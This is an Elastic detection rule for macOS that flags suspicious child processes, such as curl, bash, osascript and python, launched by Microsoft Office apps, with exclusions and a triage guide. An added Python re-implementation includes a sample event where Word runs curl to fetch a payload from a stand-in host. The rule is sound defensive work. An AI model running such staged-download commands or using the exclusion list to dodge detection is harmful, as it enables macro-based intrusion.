Suspicious macOS MS Office Child Process
Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, and Excel). These child processes are often launched during exploitation of Office applications or by documents with malicious macros.
Elastic rule
[metadata]
creation_date = "2021/01/04"
integration = ["endpoint"]
maturity = "production"
updated_date = "2025/02/04"

[rule]
author = ["Elastic"]
description = """
Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, and
Excel). These child processes are often launched during exploitation of Office applications or by documents with
malicious macros.
"""
from = "now-9m"
index = ["logs-endpoint.events.process*"]
language = "eql"
license = "Elastic License v2"
name = "Suspicious macOS MS Office Child Process"
references = ["https://blog.malwarebytes.com/cybercrime/2017/02/microsoft-office-macro-malware-targets-macs/"]
risk_score = 47
rule_id = "66da12b1-ac83-40eb-814c-07ed1d82b7b9"
setup = """## Setup

This rule requires data coming in from Elastic Defend.

### Elastic Defend Integration Setup
Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.

#### Prerequisite Requirements:
- Fleet is required for Elastic Defend.
- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).

#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:
- Go to the Kibana home page and click "Add integrations".
- In the query bar, search for "Elastic Defend" and select the integration to see more details about it.
- Click "Add Elastic Defend".
- Configure the integration name and optionally add a description.
- Select the type of environment you want to protect; for macOS it is recommended to select "Traditional Endpoints".
- Select a configuration preset. Each preset comes with different default settings for Elastic Agent; you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).
- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as the configuration preset, which provides "All events; all preventions".
- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead.
For more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).
- Click "Save and Continue".
- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts.
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "medium"
tags = [
    "Domain: Endpoint",
    "OS: macOS",
    "Use Case: Threat Detection",
    "Tactic: Initial Access",
    "Data Source: Elastic Defend",
    "Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"

query = '''
process where event.action == "exec" and host.os.type == "macos" and
  process.parent.name: (
    "Microsoft Word",
    "Microsoft Outlook",
    "Microsoft Excel",
    "Microsoft PowerPoint",
    "Microsoft OneNote"
  ) and
  process.name : (
    "curl",
    "nscurl",
    "bash",
    "sh",
    "osascript",
    "python*",
    "perl*",
    "mktemp",
    "chmod",
    "php",
    "nohup",
    "openssl",
    "plutil",
    "PlistBuddy",
    "xattr",
    "mktemp",
    "sqlite3",
    "funzip",
    "popen"
  ) and

  // Filter FPs related to product version discovery and Office error reporting behavior
  not process.args:
  (
    "ProductVersion",
    "hw.model",
    "ioreg",
    "ProductName",
    "ProductUserVisibleVersion",
    "ProductBuildVersion",
    "/Library/Application Support/Microsoft/MERP*/Microsoft Error Reporting.app/Contents/MacOS/Microsoft Error Reporting",
    "open -a Safari *",
    "defaults read *",
    "sysctl hw.model*",
    "ioreg -d2 -c IOPlatformExpertDevice *",
    "ps aux | grep 'ToDesk_Desktop' | grep -v grep",
    "PIPE=\"$CFFIXED_USER_HOME/.zoteroIntegrationPipe*"
  ) and

  not process.parent.executable :
  (
    "/Applications/ToDesk.app/Contents/MacOS/ToDesk_Service",
    "/usr/local/Privacy-i/PISupervisor",
    "/Library/Addigy/lan-cache",
    "/Library/Elastic/Agent/*",
    "/opt/jc/bin/jumpcloud-agent",
    "/usr/sbin/networksetup"
  ) and
  not (process.name : "sh" and process.command_line : "*$CFFIXED_USER_HOME/.zoteroIntegrationPipe*") and

  not process.Ext.effective_parent.executable : (
    "/Applications/ToDesk.app/Contents/MacOS/ToDesk_Service",
    "/usr/local/Privacy-i/PISupervisor",
    "/Library/Addigy/auditor",
    "/Library/Elastic/Agent/*",
    "/opt/jc/bin/jumpcloud-agent",
    "/usr/sbin/networksetup"
  )
'''
note = """## Triage and analysis

> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.

### Investigating Suspicious macOS MS Office Child Process

Microsoft Office applications on macOS can be exploited by adversaries to execute malicious child processes, often through malicious macros or document exploits. These child processes may include scripting languages or utilities that can be leveraged for unauthorized actions. The detection rule identifies such suspicious activity by monitoring for unexpected child processes spawned by Office apps, while filtering out known benign behaviors and false positives, thus helping to pinpoint potential threats.

### Possible investigation steps

- Review the parent process name and executable path to confirm if the Office application is legitimate and expected on the host.
- Examine the child process name and command line arguments to identify any potentially malicious or unexpected behavior, such as the use of scripting languages or network utilities like curl or nscurl.
- Check the process arguments for any indicators of compromise or suspicious patterns that are not filtered out by the rule, such as unexpected network connections or file modifications.
- Investigate the effective parent executable path to ensure it is not associated with known benign applications or services that are excluded by the rule.
- Correlate the alert with any recent phishing attempts or suspicious email activity that might have led to the execution of malicious macros or document exploits.
- Analyze the host's recent activity and system logs to identify any other anomalies or related alerts that could provide additional context or evidence of compromise.

### False positive analysis

- Product version discovery commands can trigger false positives. Exclude processes with arguments like "ProductVersion" and "ProductBuildVersion" to reduce noise.
- Office error reporting may cause alerts. Exclude paths related to Microsoft Error Reporting to prevent unnecessary alerts.
- Network setup and management tools such as "/usr/sbin/networksetup" can be benign. Exclude these executables if they are part of regular system operations.
- Third-party applications like ToDesk and JumpCloud Agent might be flagged. Exclude their executables if they are verified as safe and part of normal operations.
- Zotero integration can cause false positives with shell processes. Exclude specific command lines involving "CFFIXED_USER_HOME/.zoteroIntegrationPipe" to avoid these alerts.

### Response and remediation

- Immediately isolate the affected macOS device from the network to prevent further malicious activity or lateral movement.
- Terminate any suspicious child processes identified by the alert, such as those involving scripting languages or utilities like curl, bash, or osascript.
- Conduct a thorough review of the parent Microsoft Office application and associated documents to identify and remove any malicious macros or document exploits.
- Restore the affected system from a known good backup if malicious activity has compromised system integrity or data.
- Update all Microsoft Office applications to the latest version to patch any known vulnerabilities that could be exploited by similar threats.
- Implement application whitelisting to restrict the execution of unauthorized scripts and utilities, reducing the risk of exploitation through Office applications.
- Escalate the incident to the security operations team for further investigation and to assess the potential impact on other systems within the network."""


[[rule.threat]]
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
id = "T1566"
name = "Phishing"
reference = "https://attack.mitre.org/techniques/T1566/"
[[rule.threat.technique.subtechnique]]
id = "T1566.001"
name = "Spearphishing Attachment"
reference = "https://attack.mitre.org/techniques/T1566/001/"



[rule.threat.tactic]
id = "TA0001"
name = "Initial Access"
reference = "https://attack.mitre.org/tactics/TA0001/"
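To see how the query's three layers (Office parent, suspicious child name, then the false-positive exclusions) combine on real-looking events, the following Python re-implements the rule's predicate and runs it over a handful of constructed process events. This is an added example, not Elastic's code and not how the Security app evaluates EQL: the `eql_like` helper only approximates EQL's `:` operator (case-insensitive comparison with `*` wildcards, and a match on any element of an array-valued field such as `process.args`), the event dicts use the rule's ECS field names as flat keys, and every event, path and URL in `SAMPLE_EVENTS` is invented for the demonstration.

```python
"""Plain-Python re-implementation of the rule's EQL predicate (added example)."""
import fnmatch
from typing import Any, Iterable, List

# Lists copied from the rule query above.
OFFICE_PARENTS = ["Microsoft Word", "Microsoft Outlook", "Microsoft Excel",
                  "Microsoft PowerPoint", "Microsoft OneNote"]
SUSPICIOUS_CHILDREN = ["curl", "nscurl", "bash", "sh", "osascript", "python*", "perl*",
                       "mktemp", "chmod", "php", "nohup", "openssl", "plutil",
                       "PlistBuddy", "xattr", "sqlite3", "funzip", "popen"]
BENIGN_ARGS = [
    "ProductVersion", "hw.model", "ioreg", "ProductName", "ProductUserVisibleVersion",
    "ProductBuildVersion",
    "/Library/Application Support/Microsoft/MERP*/Microsoft Error Reporting.app/Contents/MacOS/Microsoft Error Reporting",
    "open -a Safari *", "defaults read *", "sysctl hw.model*",
    "ioreg -d2 -c IOPlatformExpertDevice *",
    "ps aux | grep 'ToDesk_Desktop' | grep -v grep",
    'PIPE="$CFFIXED_USER_HOME/.zoteroIntegrationPipe*',
]
BENIGN_PARENT_EXECUTABLES = [
    "/Applications/ToDesk.app/Contents/MacOS/ToDesk_Service", "/usr/local/Privacy-i/PISupervisor",
    "/Library/Addigy/lan-cache", "/Library/Elastic/Agent/*", "/opt/jc/bin/jumpcloud-agent",
    "/usr/sbin/networksetup",
]
BENIGN_EFFECTIVE_PARENTS = [
    "/Applications/ToDesk.app/Contents/MacOS/ToDesk_Service", "/usr/local/Privacy-i/PISupervisor",
    "/Library/Addigy/auditor", "/Library/Elastic/Agent/*", "/opt/jc/bin/jumpcloud-agent",
    "/usr/sbin/networksetup",
]
ZOTERO_PIPE = "*$CFFIXED_USER_HOME/.zoteroIntegrationPipe*"


def eql_like(value: Any, patterns: Iterable[str]) -> bool:
    """Approximation of EQL ':' - case-insensitive, '*' is a wildcard, and an
    array-valued field (e.g. process.args) matches when any element matches."""
    if value is None:
        return False
    values = value if isinstance(value, list) else [value]
    return any(fnmatch.fnmatchcase(str(v).lower(), p.lower())
               for v in values for p in patterns)


def rule_matches(event: dict) -> bool:
    """True when this event would raise the rule's alert."""
    # '==' in EQL is an exact, case-sensitive comparison.
    if event.get("event.action") != "exec" or event.get("host.os.type") != "macos":
        return False
    if not eql_like(event.get("process.parent.name"), OFFICE_PARENTS):
        return False
    if not eql_like(event.get("process.name"), SUSPICIOUS_CHILDREN):
        return False
    # False-positive exclusions, in the same order as the query.
    if eql_like(event.get("process.args"), BENIGN_ARGS):
        return False
    if eql_like(event.get("process.parent.executable"), BENIGN_PARENT_EXECUTABLES):
        return False
    if (eql_like(event.get("process.name"), ["sh"])
            and eql_like(event.get("process.command_line"), [ZOTERO_PIPE])):
        return False
    if eql_like(event.get("process.Ext.effective_parent.executable"), BENIGN_EFFECTIVE_PARENTS):
        return False
    return True


def office_event(eid: str, parent: str, name: str, args: List[str], **extra: Any) -> dict:
    """Build a constructed macOS exec event with the fields the rule reads."""
    ev = {"id": eid, "event.action": "exec", "host.os.type": "macos",
          "process.parent.name": parent, "process.name": name,
          "process.args": args, "process.command_line": " ".join(args)}
    ev.update(extra)
    return ev


# Constructed sample telemetry (hypothetical hosts, paths and URLs).
SAMPLE_EVENTS = [
    office_event("word-curl", "Microsoft Word", "curl",
                 ["curl", "-o", "/tmp/stage", "http://example.invalid/stage"]),
    office_event("word-python", "Microsoft Word", "python3",        # matched via "python*"
                 ["python3", "-c", "import os"]),
    office_event("outlook-defaults", "Microsoft Outlook", "sh",    # args exclusion "defaults read *"
                 ["sh", "-c", "defaults read com.microsoft.Outlook"]),
    office_event("excel-zotero", "Microsoft Excel", "sh",          # sh + command_line exclusion
                 ["sh", "-c", "cat > $CFFIXED_USER_HOME/.zoteroIntegrationPipe_1"]),
    office_event("word-jumpcloud", "Microsoft Word", "bash",       # effective-parent exclusion
                 ["bash", "-c", "true"],
                 **{"process.Ext.effective_parent.executable": "/opt/jc/bin/jumpcloud-agent"}),
    office_event("safari-curl", "Safari", "curl",                  # parent is not Office
                 ["curl", "http://example.invalid/"]),
    office_event("linux-word", "Microsoft Word", "curl",           # wrong OS
                 ["curl", "http://example.invalid/"], **{"host.os.type": "linux"}),
]


def evaluate(events: Iterable[dict]) -> List[str]:
    """Return the ids of events that would alert."""
    return [e["id"] for e in events if rule_matches(e)]


if __name__ == "__main__":
    print("alerting events:", evaluate(SAMPLE_EVENTS))
```

Only the first two constructed events alert; the other Office-spawned shells are dropped by a different exclusion each, which is the behaviour to re-check whenever an exclusion is added, since an over-broad wildcard such as `defaults read *` in `process.args` silences any child whose argument vector happens to contain a matching element.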
Related rules
- Suspicious Browser Child Process
- Access to Keychain Credentials Directories
- Apple Scripting Execution with Administrator Privileges
- Attempt to Mount SMB Share via Command Line
- Creation of Hidden Launch Agent or Daemon